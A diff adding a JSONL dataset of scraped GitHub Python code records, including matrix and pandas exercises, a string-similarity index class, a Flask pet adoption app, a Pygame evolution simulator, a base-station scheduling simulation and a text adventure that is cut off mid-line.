diff --git "a/3888.jsonl" "b/3888.jsonl" new file mode 100644--- /dev/null +++ "b/3888.jsonl" @@ -0,0 +1,663 @@ +{"seq_id":"70109098157","text":"import copy\n\n\nclass MatrixSizeError(Exception):\n pass\n\n\nclass Matrix:\n # Part 1\n def __init__(self, matrix):\n self.matrix = copy.deepcopy(matrix)\n\n def __str__(self):\n return '\\n'.join('\\t'.join(map(str, row)) for row in self.matrix)\n\n # Part 2\n def __eq__(self, other):\n if isinstance(other, Matrix):\n if len(self.matrix) != len(other.matrix):\n return False\n elif len(self.matrix) == 0:\n return True\n elif len(self.matrix[0]) != len(other.matrix[0]):\n return False\n else:\n if len(self.matrix) == \\\n sum([1 for i, j in zip(self.matrix, other.matrix) if i == j]):\n return True\n else:\n return False\n else:\n raise TypeError\n\n def size(self):\n if len(self.matrix) == 0:\n return 0, 0\n else:\n return len(self.matrix), len(self.matrix[0])\n\n # Part 3\n def __add__(self, other):\n # return self + other\n if isinstance(other, Matrix):\n if self.size() != other.size():\n raise MatrixSizeError\n else:\n return Matrix([[self.matrix[i][j] + other.matrix[i][j]\n for j in range(len(self.matrix[0]))]\n for i in range(len(self.matrix))])\n else:\n raise TypeError\n\n def __sub__(self, other):\n # return self - other\n if isinstance(other, Matrix):\n if self.size() != other.size():\n raise MatrixSizeError\n else:\n return Matrix([[self.matrix[i][j] - other.matrix[i][j]\n for j in range(len(self.matrix[0]))]\n for i in range(len(self.matrix))])\n else:\n raise TypeError\n\n # Part 4\n def __mul__(self, other):\n # return self * other\n if isinstance(other, Matrix):\n a_size = self.size()\n b_size = other.size()\n if a_size[1] != b_size[0]:\n raise MatrixSizeError\n elif a_size == (0, 0):\n return Matrix(other.matrix)\n elif b_size == (0, 0):\n return Matrix(self.matrix)\n else:\n return Matrix([[sum(a*b for a, b in zip(X_row, Y_col))\n for Y_col in zip(*other.matrix)]\n for X_row in self.matrix])\n else:\n raise TypeError\n\n # Part 5\n def transpose(self):\n if self.size == (0, 0):\n return Matrix([])\n else:\n return Matrix([[self.matrix[j][i] for j in range(len(self.matrix))]\n for i in range(len(self.matrix[0]))])\n\n # Part 6\n def tr(self):\n pass\n\n def det(self):\n pass\n","repo_name":"crypto-cat2008/SM_HSE_Python_Algo_Data_Structures","sub_path":"APw5Matrix.py","file_name":"APw5Matrix.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6063853808","text":"import numpy as np\nimport pandas as pd\n\nvoivoideships_data_source = {\n 'dolnosląskie': {\n 'nr rejestru': 2,\n 'miasto wojewódzkie': 'Wrocław',\n 'powierzchnia [km2]': 19946.70,\n 'ludność': 2904198\n },\n 'kujawsko-pomorskie': {\n 'nr rejestru': 4,\n 'miasto wojewódzkie': 'Bydgoszcz / Toruń',\n 'powierzchnia [km2]': 17971.34,\n 'ludność': 2086210\n },\n 'lubelskie': {\n 'nr rejestru': 6,\n 'miasto wojewódzkie': 'Lublin',\n 'powierzchnia [km2]': 25122.46,\n 'ludność': 2139726\n },\n 'lubuskie': {\n 'nr rejestru': 8,\n 'miasto wojewódzkie': 'Gorzów Wielkopolski / Zielona Góra',\n 'powierzchnia [km2]': 13987.93,\n 'ludność': 1018084\n },\n 'łódzkie': {\n 'nr rejestru': 10,\n 'miasto wojewódzkie': 'Łódź',\n 'powierzchnia [km2]': 18218.95,\n 'ludność': 2493603\n },\n 'małopolskie': {\n 'nr rejestru': 12,\n 'miasto wojewódzkie': 'Kraków',\n 'powierzchnia [km2]': 15182.79,\n 'ludność': 3372618\n },\n 'mazowieckie': {\n 'nr rejestru': 14,\n 'miasto wojewódzkie': 'Warszawa',\n 
'powierzchnia [km2]': 35558.47,\n 'ludność': 5349114\n },\n}\n# 4\nvoivoideships = pd.DataFrame.from_dict(voivoideships_data_source, orient='index')\n\n# 4.1\nprint(\"4.1. Small cities\")\nsmall_cities = voivoideships['powierzchnia [km2]'] < 20000\nprint(voivoideships.loc[small_cities, ['miasto wojewódzkie']])\n\n# 4.2\nprint(\"4.2. Cities with biggest population\")\ncities_with_biggest_population = pd.DataFrame.from_records(voivoideships[voivoideships['ludność'] > 2000000])\nprint(cities_with_biggest_population)\n\n# 4.3\nprint('4.3. New row')\nwielkopolska = [30, 'Poznań', 29826.50, 3475323]\nvoivoideships.loc['wielkopolska'] = wielkopolska\nprint(voivoideships)\n\n# 4.4\nprint('4.4. Sort by population')\nprint(voivoideships.sort_values(by='ludność', ascending=False))\n\n# 4.5\nprint('4.5. Reordering')\nvoivoideships = voivoideships[['nr rejestru', 'powierzchnia [km2]', 'ludność', 'miasto wojewódzkie']]\nprint(voivoideships)\n\n# 4.6\nprint('4.6. Capitalized')\nvoivoideships.index = voivoideships.index.str.capitalize()\nprint(voivoideships)\n\n# 4.7\nprint('4.7. Series with index and boolean')\nindex_and_boolean = pd.Series((voivoideships['ludność'] / voivoideships['powierzchnia [km2]']) > 140,\n index=voivoideships.index)\nprint(index_and_boolean)\n\n# 4.8\nprint('4.8. Delete row')\nvoivoideships.drop(['Lubuskie'], axis=0, inplace=True)\nprint(voivoideships)\n\n# 4.9\nprint('4.9. describe()')\nprint(voivoideships.describe())\n","repo_name":"Jaclawiciel/Analiza-i-przetwarzanie-danych-w-Python","sub_path":"Zajęcia 3 - Biblioteki NumPy i Pandas/4. Pandas DataFrame.py","file_name":"4. Pandas DataFrame.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5954147460","text":"from sys import maxsize\n\nfrom py_stringsimjoin.filter.filter_utils import get_prefix_length\nfrom py_stringsimjoin.index.index import Index\nfrom py_stringsimjoin.utils.token_ordering import order_using_token_ordering\n\n\nclass PositionIndex(Index):\n \"\"\"Builds a position index on the input column in the input table. \n \n Position index is used by position filter, dice join, cosine join and \n jaccard join. 
\n \"\"\" \n\n def __init__(self, table, index_attr, tokenizer, \n sim_measure_type, threshold, token_ordering):\n self.table = table\n self.index_attr = index_attr\n self.tokenizer = tokenizer\n self.sim_measure_type = sim_measure_type\n self.threshold = threshold\n self.token_ordering = token_ordering\n self.index = None\n self.size_cache = None\n self.min_length = maxsize\n self.max_length = 0\n super(self.__class__, self).__init__()\n\n def build(self, cache_empty_records=True, cache_tokens=False):\n \"\"\"Build position index.\"\"\"\n self.index = {}\n self.size_cache = []\n cached_tokens = []\n empty_records = []\n row_id = 0\n for row in self.table:\n # tokenize string and order the tokens using the token ordering \n index_string = row[self.index_attr]\n index_attr_tokens = order_using_token_ordering(\n self.tokenizer.tokenize(index_string), self.token_ordering)\n\n # compute prefix length\n num_tokens = len(index_attr_tokens)\n prefix_length = get_prefix_length(\n num_tokens,\n self.sim_measure_type, self.threshold,\n self.tokenizer)\n\n # update the index\n pos = 0\n for token in index_attr_tokens[0:prefix_length]:\n if self.index.get(token) is None:\n self.index[token] = []\n self.index.get(token).append((row_id, pos))\n pos += 1\n\n self.size_cache.append(num_tokens)\n\n # keep track of the max size and min size.\n if num_tokens < self.min_length:\n self.min_length = num_tokens\n\n if num_tokens > self.max_length:\n self.max_length = num_tokens\n\n # if cache_tokens flag is set to True, the store the tokens. \n if cache_tokens:\n cached_tokens.append(index_attr_tokens)\n\n if cache_empty_records and num_tokens == 0:\n empty_records.append(row_id)\n\n row_id += 1 \n\n return {'cached_tokens' : cached_tokens,\n 'empty_records' : empty_records}\n\n def probe(self, token):\n \"\"\"Probe position index using the input token.\"\"\"\n return self.index.get(token, [])\n\n def get_size(self, row_id):\n return self.size_cache[row_id]\n","repo_name":"anhaidgroup/py_stringsimjoin","sub_path":"py_stringsimjoin/index/position_index.py","file_name":"position_index.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"73"} +{"seq_id":"71571059115","text":"from monkeytest import *\n\n\nif __name__==\"__main__\":\n file_path = os.path.abspath(\"monkeyconfig.xls\")\n systemkind=input(\"请输入你要测试的系统(其中1代表国网系统,2代表gcloud系统):\") #手动输入你要测试的系统代表值\n configs=Readconfig(file_path,systemkind).configs\n monkeytest=Monkeytest(configs)\n proxy=monkeytest.get_proxy()\n driver=monkeytest.get_driver(proxy)\n proxy.new_har(\"douyin\", options={'captureHeaders': True, 'captureContent': True})\n monkeytest.login(driver)\n monkeytest.autoclick(driver,int(configs['clickcount']))\n result = proxy.har\n now_time = datetime.now(tz=pytz.timezone(\"Asia/Shanghai\")).strftime(\"%Y-%m-%d_%H-%M-%S\")\n \n if systemkind=='1': #根据你输入的系统代表值去定义测试报告中sheet名称 \n sheet_name='国网系统'\n elif systemkind=='2':\n sheet_name='gcloud系统'\n else:\n sheet_name='其他'\n reportfile_path=str('report/')\n report=Savereport(reportfile_path+now_time+ \".xlsX\",sheet_name)\n bold=report.set_sheet_style(sheet_name) \n set_sheet_title(report,bold,sheet_name)\n\n parse_result(result,report,bold,sheet_name)\n report.close_excel() \n server.stop\n 
print(\"测试完毕\")","repo_name":"yao0013/monkeytest_tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36831369028","text":"#!/usr/bin/python\n\n# 统计命令行参数指定目录下全体文件字符频数\n\nimport os\nimport sys\n\n\ndef update_dict(l, d):\n new_d = d\n for c in l:\n new_d[c] = new_d.get(c, 0) + 1\n return new_d\n\n\ndirs = os.listdir(sys.argv[1])\nos.chdir(sys.argv[1])\nfreq = dict()\nfor file in dirs:\n fin = open(file)\n for line in fin:\n freq = update_dict(line, freq)\nsorted_freq = sorted(freq.items(), key=lambda d: d[1])\nprint(\"字符频数(升序):\")\nprint(sorted_freq)\n","repo_name":"KofClubs/FSW-Temperature-Field-Compressor","sub_path":"scripts/char_counter.py","file_name":"char_counter.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26419578687","text":"from flask import Flask, request, render_template, flash, redirect, jsonify\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom model import db, connect_db, Pet\nfrom form import AddPetForm, EditPetForm\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///pet_shop_test'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = \"secret\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS']=False\ntoolbar = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n@app.route('/')\ndef home():\n pet=Pet.query.all()\n return render_template('home.html',pet=pet)\n\n@app.route('/add', methods=['GET','POST'])\ndef add_pet():\n form=AddPetForm()\n if form.validate_on_submit():\n name=form.pet_name.data\n species=form.species.data\n photo_url=form.photo_url.data\n age=form.age.data\n note=form.note.data\n\n pet=Pet(name=name, species=species, photo_url=photo_url,age=age, notes=note)\n db.session.add(pet)\n db.session.commit()\n flash(f\"{pet.name} added.\")\n return redirect('/')\n else:\n return render_template('add_pet_form.html',form=form)\n\n@app.route('/', methods=['GET', 'POST'])\ndef edit_pet(pet_id):\n pet=Pet.query.get_or_404(pet_id)\n form= EditPetForm(obj=pet)\n\n if form.validate_on_submit():\n pet.note=form.note.data\n pet.available=form.available.data\n pet.photo_url=form.photo_url.data\n db.session.commit()\n flash(f\"{pet.name} updated.\")\n return redirect('/')\n else:\n\n return render_template('edit_pet_form.html',form=form, pet=pet)\n# \"\"\"return pet info in jason format\"\"\"\n@app.route(\"/api/pets/\", methods=['GET'])\ndef api_get_pet(pet_id):\n \"\"\"Return basic info about pet in JSON.\"\"\"\n\n pet = Pet.query.get_or_404(pet_id)\n info = {\"name\": pet.name, \"age\": pet.age}\n\n return jsonify(info)","repo_name":"azhm65ptk/pet_adoption_agency","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4975267212","text":"class Account:\n def __init__(self, owner, balance=0):\n self.owner = owner\n self.balance = balance\n\n def __str__(self):\n return f'Account owner:{self.owner}\\nAccount balance: ${self.balance}'\n\n def deposit(self, dep_amt):\n self.balance += dep_amt\n print(f'${dep_amt} Deposit Accepted')\n\n def withdraw(self, wd_amt):\n if self.balance >= wd_amt:\n self.balance -= wd_amt\n print(f'${wd_amt} Withdrawal Accepted')\n else:\n print('Funds 
Unavailable!')\n\n\nacct1 = Account('Shri',800)\nprint(acct1)\nacct1.deposit(200)\nacct1.withdraw(500)\nprint(f'Current balance :{acct1.balance}')","repo_name":"shrinath770/shri_repository","sub_path":"A My Practice/PycharmProjects/Python_Practice/ass7.py","file_name":"ass7.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"33967422707","text":"import pygame, sys , random , math\r\npygame.init()\r\n#OPTIONS________________________________________________________________________________________________________________\r\n#JUNGLE\r\nsettings = input('own / default')\r\n\r\nif settings == 'default' or settings == 'd':\r\n    jx = 250\r\n    jy = 1300\r\n    a_count = 10\r\n    food_time = 10\r\n    food_j = 2\r\n    food_p = 1\r\n    energy_time = 20\r\n    energy_take = 2\r\n    energy_start = 30\r\n    energy_add = 10\r\n    energy_to_copulation = 60\r\n    speed = 20\r\n\r\nif settings == 'own':\r\n    jy = int(input(\"Jungle height\"))\r\n    jx = int(input('Jungle width'))\r\n    if int(jy) > 900:\r\n        while int(jy) > 900:\r\n            jy = int(input(\"jungle height value is too big max = 900\"))\r\n\r\n    if int(jx) > 1300:\r\n        while int(jx) > 1300:\r\n            jx = int(input(\"jungle width value is too big max = 1300\"))\r\n\r\n    #ANIMALS\r\n    a_count = int(input('How many animals at the beginning'))\r\n    speed = int(input('Animal Speed'))\r\n\r\n    #FOOD\r\n    food_time = int(input(\"Create food in seconds\"))\r\n    food_j = int(input('How many food in jungle per second'))\r\n    food_p = int(input('How many food in plains per second'))\r\n\r\n    #ENERGY\r\n    energy_time = int(input('How many seconds to take energy'))\r\n    energy_take = int(input('How many energy to take'))\r\n    energy_start = int(input('How much energy at the beginning'))\r\n    energy_add = int(input('How much energy to add by eating the plant'))\r\n    energy_to_copulation= int(input('Minimal value of energy to copulation'))\r\n#VARIABLE_______________________________________________________________________________________________________________\r\n#FPS\r\nmax_fps = 1\r\nclock = pygame.time.Clock()\r\ndelta = 0.0\r\n\r\n#ANIMALS\r\nanim = []\r\n\r\n#FOOD\r\nfood_jun = []\r\nfood_pla = []\r\n\r\n#SCREEN\r\nscreen = pygame.display.set_mode((1600,900))\r\n\r\n#POINT JUNGLE\r\n\r\npj_x = int((1900 - (jx))/2)\r\npj_y = int((900 - (jy))/2)\r\n\r\n#Time\r\ntime = 0\r\ntime_energy = 0\r\n\r\n\r\n#FUNCTIONS______________________________________________________________________________________________________________\r\n\r\n#FOOD ADD\r\ndef food_add():\r\n    for f in range(0,(food_j)):\r\n        food_jun.append([random.randint ((pj_x), (pj_x) + (jx)), random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n    for f in range(0,(food_p)):\r\n        food_pla.append([random.randint(330,1600),random.randint(0,900)])\r\n\r\ndef food_print():\r\n    for i in range(0,len(food_jun)):\r\n        pygame.draw.rect(screen, (184, 186, 86), (food_jun[i][0], food_jun[i][1], 12 , 12))\r\n    for f in range(0,len(food_pla)):\r\n        pygame.draw.rect(screen, (10, 171, 131), (food_pla[f][0], food_pla[f][1], 12, 12))\r\n\r\n\r\n#ANIM ADD\r\nfor a in range(0,int(a_count)):\r\n    anim.append([random.randint(320, 1580),random.randint(20, 880),(energy_start),0])\r\n\r\ndef anim_print():\r\n    for a in anim:\r\n\r\n        if a[2] < energy_start*0.5:\r\n            pygame.draw.rect(screen, (222, 64, 64), (a[0], a[1], 20, 20))\r\n        elif a[2] < energy_start:\r\n            pygame.draw.rect(screen, (173, 23, 23), (a[0], a[1], 20, 20))\r\n        elif a[2] < energy_start * 1.5:\r\n            pygame.draw.rect(screen, (112, 8, 8), (a[0], 
a[1], 20, 20))\r\n elif a[2] < energy_start * 2:\r\n pygame.draw.rect(screen, (82, 2, 2), (a[0], a[1], 20, 20))\r\n else:\r\n pygame.draw.rect(screen, (140, 13, 13), (a[0], a[1], 20, 20))\r\n\r\ndef anim_move():\r\n for i in range(len(anim)):\r\n move = random.randint(0,3)\r\n if anim[i][1] >= 860:\r\n anim[i][1] -= 20\r\n if anim[i][1] <= 40:\r\n anim[i][1] += 20\r\n if anim[i][0] <= 340:\r\n anim[i][0] += 20\r\n if anim[i][0] >= 1560:\r\n anim[i][0] -= 20\r\n\r\n if move == 0:\r\n anim[i][0] -=speed\r\n if move == 1:\r\n anim[i][0] +=speed\r\n if move == 2:\r\n anim[i][1] -=speed\r\n if move == 3:\r\n anim[i][1] +=speed\r\n\r\ndef fast():\r\n global max_fps\r\n mx,my= pygame.mouse.get_pos()\r\n if mx >= 25 and mx <= 275 and my >= 835 and my <= 875:\r\n pygame.draw.rect(screen, (10, 10, 10), (mx, 850, 15, 15))\r\n max_fps = float(mx-24)\r\n\r\ndef pokrywaja_sie(box1,box2):\r\n\r\n srodek_1_x = box1.x + box1.width/2\r\n srodek_2_x = box2.x + box2.width / 2\r\n srodek_1_y = box1.y + box1.height / 2\r\n srodek_2_y = box2.y + box2.height / 2\r\n\r\n r_1 = box1.width/2\r\n r_2 = box2.width/2\r\n\r\n odleglos = math.sqrt((srodek_2_x - srodek_1_x)**2 + (srodek_1_y - srodek_2_y)**2)\r\n if odleglos > r_1 + r_2:\r\n return False\r\n return True\r\n\r\ndef anim_ded():\r\n for animal in anim:\r\n\r\n if animal[2] <= 0:\r\n anim.remove(animal)\r\n\r\ndef chart():\r\n pygame.draw.rect(screen, (55, 163, 16), (250, 10, 5, 5))\r\n\r\ndef click():\r\n mx, my = pygame.mouse.get_pos()\r\n for o in anim:\r\n if keys[pygame.K_r]:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 40, 40), pygame.Rect(mx, my, 45, 45)):\r\n print(o)\r\n\r\nfor i in range(50):\r\n food_add()\r\n\r\n#LOOP___________________________________________________________________________________________________________________\r\nwhile True:\r\n for i in pygame.event.get():\r\n if i.type == pygame.QUIT:\r\n sys.exit(0)\r\n#before the loop--------------------------------------------------------------------------------------------------------\r\n anim_ded()\r\n#FPS____________________________________________________________________________________________________________________\r\n delta += clock.tick() / 1000.0\r\n while delta > 1 / max_fps:\r\n delta -= 1 / max_fps\r\n\r\n#VARIABLE IN LOOP_______________________________________________________________________________________________________\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_c]:\r\n print(len(anim))\r\n\r\n\r\n click()\r\n for i,o in enumerate(food_jun):\r\n for a in anim:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 15,15), pygame.Rect(a[0], a[1], 20, 20)):\r\n food_jun.pop(i)\r\n a[2] = a[2] + energy_add\r\n a[3] = a[3] + 1\r\n food_jun.append([random.randint((pj_x), (pj_x) + (jx)),random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n for i,o in enumerate(food_pla):\r\n for a in anim:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 15,15), pygame.Rect(a[0], a[1], 20, 20)):\r\n food_pla.pop(i)\r\n a[2] = a[2] + energy_add\r\n a[3] = a[3] + 1\r\n food_pla.append([random.randint((pj_x), (pj_x) + (jx)),random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n for o in anim:\r\n for o2 in anim:\r\n if o != o2:\r\n if o[2] > energy_to_copulation and o2[2] > energy_to_copulation:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 20, 20), pygame.Rect(o2[0], o2[1], 20, 20)):\r\n anim.append([random.randint(320, 1580), random.randint(20, 880), (energy_start), 0])\r\n o[2] /= 2\r\n o2[2] /= 
2\r\n\r\n\r\n\r\n#DRAWING________________________________________________________________________________________________________________\r\n pygame.display.flip()\r\n screen.fill((107, 191, 94))\r\n\r\n #TERRAIN\r\n pygame.draw.rect(screen, (77, 151, 74), ( int((1900 - jx)/2) , int((900 - jy)/2) ,int(jx) ,int(jy)))\r\n pygame.draw.rect(screen, (230,230,230), (0,0,300,900))\r\n\r\n #FPS\r\n pygame.draw.rect(screen, (100,100,100), (25,850,250,15))\r\n fast()\r\n\r\n time += 1\r\n #FOOD\r\n if time == int(food_time):\r\n food_add()\r\n time = 0\r\n food_print()\r\n\r\n time_energy += 1\r\n if time_energy == int(energy_time):\r\n time_energy = 0\r\n for a in range(0, int(len(anim))):\r\n anim[a][2] = anim[a][2] - int(energy_take)\r\n\r\n #ANIMALS\r\n anim_print()\r\n anim_move()\r\n","repo_name":"Peokk/Virtual-Animal-Environment---Evolution-Simulator","sub_path":"Virtual Animal Environment.py","file_name":"Virtual Animal Environment.py","file_ext":"py","file_size_in_byte":8011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"86603387397","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_stf_selector\n----------------------------------\n\nTests for `selector` module.\n\"\"\"\n\nfrom mock import patch\nfrom stf_selector.stf import STF\nfrom stf_selector.query import where\nfrom stf_selector.selector import Selector\n\n\n@patch.object(STF, 'devices')\ndef test_find_without_cond(mock_devices, generate_data):\n \"\"\"\n test find method with no cond\n :return: len of devices\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n s = s.find()\n assert s.count() == 9\n\n\n@patch.object(STF, 'devices')\ndef test_find_with_one_cond(mock_devices, generate_data):\n \"\"\"\n test find method with one cond\n\n :param cond: condition to filter devices.\n like : where(\"sdk\")==19 the details syntax\n See more at: http://\n :type cond: where\n :return: len of device\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n\n cond = where(\"sdk\") == '19'\n s = s.find(cond=cond)\n assert s.count() == 2\n\n\n@patch.object(STF, 'devices')\ndef test_find_with_multi_conds(mock_devices, generate_data):\n \"\"\"\n test find method with multi cond\n\n condition to filter devices.\n there are two ways to do muitl filter\n Firstly:\n like : (where(\"sdk\")==19) & (where(\"manufacturer\") == 'OPPO')\n like : (where(\"sdk\")==19) | (where(\"manufacturer\") == 'OPPO')\n or like :((where(\"manufacturer\") == 'SAMSUNG') | (where(\"manufacturer\") == 'OPPO')) & (where(\"sdk\")==19)\n Secondly:\n s.find(cond=cond).find(cond=cond)\n or : s.find(cond=cond).find(cond=cond).find(...)\n See more at: http://\n :type : where\n :return: len of device\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n\n # you can code like\n cond = ((where(\"manufacturer\") == 'SAMSUNG')\n | (where(\"manufacturer\") == 'OPPO')) \\\n & (where(\"sdk\") == '19')\n s = s.find(cond=cond)\n assert s.count() == 1\n","repo_name":"RedQA/stf-selector","sub_path":"tests/test_stf_selector.py","file_name":"test_stf_selector.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"73"} +{"seq_id":"1820416316","text":"import logging\nimport statistics\nfrom math import copysign, inf\n\nimport numpy.random as random\nfrom typing import List\nfrom ResourceBlock import ResourceBlock\nfrom User import User\n\n\ndef 
divide(a, b):\n if b == 0:\n return copysign(inf, b)\n else:\n return a / b\n\n\ndef generate_fucking_random_bigger_than_fucking_0_ffs(l: float) -> int:\n tmp = round(random.exponential(l))\n while tmp == 0:\n tmp = round(random.exponential(l))\n\n return tmp\n\n\nclass BTS:\n def __init__(self, k_: int, s_: int, epsilon_: float, clock_: int, simulation_time_: int, t1l: int, t2l: int,\n _log: logging):\n self.log: logging.Logger = _log.getChild(__name__)\n self.k: int = k_ # ilość Resource Blocks\n self.k_max: int = 3 # ilość ResourceBlocków do przydzielenie maksymalnie\n self.s: int = s_ # czas co ile przydzielane są bloki zasobów RB\n self.epsilon: float = epsilon_ # prawdopodobienstwo, że transmisja się nie uda\n self.tau: float = generate_fucking_random_bigger_than_fucking_0_ffs(\n 10) # odstęp czasowy między zmianą warunków propagacji dla każdego usera\n self.t1: int = t1l # generate_fucking_random_bigger_than_fucking_0_ffs(t1l)\n self.t2: int = t2l # generate_fucking_random_bigger_than_fucking_0_ffs(t2l)\n self.clock: int = clock_ # zegar BTSa (1 cykl = 1ms)\n self.cycles_done: int = 0 # wykonane cykle zegarowe przez BTS.\n self.taken_rb_count: int = 0 # ilość zajętych ResourceBlocków\n self.user_list: List[User] = list() # [User(_log=self.log, _rb=list()) for _ in range(15)]\n self.served_users: int = 0\n self.new_users: int = 0\n self.simulation_time: int = simulation_time_ * 1000\n self.avg_waittime: List[int] = list()\n self.data_sent: List[int] = list()\n self.data_retransmitted: List[int] = list()\n self.user_mean_data_sent: List[int] = list()\n self.user_mean_data_retransmitted: List[int] = list()\n self.correct_transmission = 0\n self.error_trasmission = 0\n self.initial_phase: bool = False\n self.initial_phase_cycles: int = None\n\n print(self.t1, self.t2, simulation_time_)\n\n self.log.log(msg='Created Base Transmitting Station', level=1)\n\n def run(self, step_by_step: bool):\n while self.simulation_time >= self.cycles_done:\n self.step()\n\n if step_by_step:\n if input('Press \"Enter\" to continue, \":q!\" then \"Enter\" to exit simulation...\\n') == ':q!':\n exit(0)\n\n def step(self):\n if not self.cycles_done % self.t1:\n self.add_user()\n self.log.log(msg='Added user with t1', level=1)\n\n if not self.cycles_done % self.t2:\n self.add_user()\n self.log.log(msg='Added user with t2', level=1)\n\n if not self.cycles_done % self.tau:\n self.update_users_throughput()\n self.log.log(msg='Updated users propagation conditions', level=1)\n\n if not self.cycles_done % self.s and self.user_list:\n self.redistribute_resource_blocks()\n self.log.log(msg='Updated users resource blocks', level=1)\n\n # tmp = list()\n # tmp2 = list()\n for user in self.user_list:\n tmp = list()\n tmp2 = list()\n if user.d > 0 and user.has_resource_blocks():\n for rb in user.user_rb_list:\n if rb.is_sent:\n user.d -= rb.throughput\n self.correct_transmission += 1\n tmp.append(rb.throughput)\n self.log.log(msg='Sent packet!', level=1)\n else:\n rb.update_is_sent()\n self.error_trasmission += 1\n tmp2.append(rb.throughput)\n self.log.log(msg='Packet updated!', level=2)\n\n user.throughputs.append(tmp if tmp else [0])\n user.retransmitted.append(tmp2 if tmp2 else [0])\n self.data_retransmitted.append(statistics.mean(tmp2 if tmp2 else [0]))\n self.data_sent.append(statistics.mean(tmp if tmp else [0]))\n user.update_prev_sum_d()\n\n if user.d <= 0:\n if self.initial_phase:\n self.avg_waittime.append(user.waittime)\n self.user_mean_data_sent.append(statistics.mean(statistics.mean(t) for t in 
user.throughputs if t))\n self.user_mean_data_retransmitted.append(statistics.mean([statistics.mean(r) for r in user.retransmitted if r]))\n self.remove_user(user)\n\n user.update_user_waittime()\n\n self.cycles_done += self.clock\n\n def add_user(self) -> None:\n self.user_list.append(User(_log=self.log, _rb=list()))\n self.new_users += 1\n\n self.log.log(msg='Added user to BTS!', level=1)\n\n def remove_user(self, user: User) -> None:\n # self.taken_rb_count -= len(user.user_rb_list)\n self.user_list.remove(user)\n self.served_users += 1\n\n self.log.log(msg='Removed user!', level=1)\n\n def update_users_throughput(self) -> None: # Update throughput of existing ResourceBlocks\n for user in self.user_list:\n user.update_user_existing_rbs()\n\n def redistribute_resource_blocks(self) -> None:\n for user in self.user_list:\n user.clear_resource_blocks()\n\n for i in range(len(self.user_list) * self.k_max if len(self.user_list) < self.k / self.k_max else self.k):\n value, user_index = max(\n ((divide(user.get_current_throughput(), user.get_avg_throughput()), user_index) for user_index, user in\n enumerate(self.user_list) if not user.has_all_resource_blocks()), key=lambda x: x[0])\n picked = self.user_list[user_index]\n\n picked.add_resource_block(ResourceBlock(_log=self.log, _epsilon=self.epsilon))\n\n if (i == self.k - 1 or self.cycles_done > 100) and not self.initial_phase:\n self.initial_phase = True\n self.initial_phase_cycles = self.cycles_done\n","repo_name":"loboda4450/symulacja_cyfrowa","sub_path":"BTS.py","file_name":"BTS.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73063001515","text":"# Modify the program so that the exits is a dictionary rather than a list,\n# with the keys being the numbers of the locaitons and the values being \n# dictionaries holding the exits (as they do at present). No change should\n# be needed to the actual code.\n\n# Once that is working, creat another dictionary that contains words that\n# players may use. 
These words will be the keys, and their values will be\n# a single letter that the program can use to determine which way to go\n\n\n\nlocations = {\n    0: \"You are sitting in front of a computer learning Python\",\n    1: \"You are standing at the end of a road before a small brick building\",\n    2: \"You are at the top of a hill\",\n    3: \"You are inside a building, a well house for a small stream\",\n    4: \"You are in a valley beside a stream\",\n    5: \"You are in the forest\", \n}\n\nexits = {\n    0: {\"Q\": 0},\n    1: {\"W\": 2, \"E\": 3, \"S\": 4, \"N\": 5, \"Q\": 0},\n    2: {\"N\": 5, \"E\": 1, \"Q\": 0},\n    3: {\"W\": 1, \"Q\": 0,},\n    4: {\"W\": 2, \"N\": 1, \"Q\": 0},\n    5: {\"W\": 2, \"S\": 1, \"Q\": 0}, \n}\nwords = {\n    \"WEST\": \"W\",\n    \"EAST\": \"E\",\n    \"NORTH\": \"N\",\n    \"SOUTH\": \"S\",\n    \"QUIT\": \"Q\"\n}\n\n\nloc = 1\nwhile True:\n    print(locations[loc])\n    available_exits = \", \".join(exits[loc].keys())\n    \n    if loc == 0:\n        break\n    \n    direction = input(\"Available exits are \" + available_exits + \" \").upper()\n    if direction in exits[loc]:\n        loc = exits[loc][direction]\n    elif direction in words.keys():\n        direction = 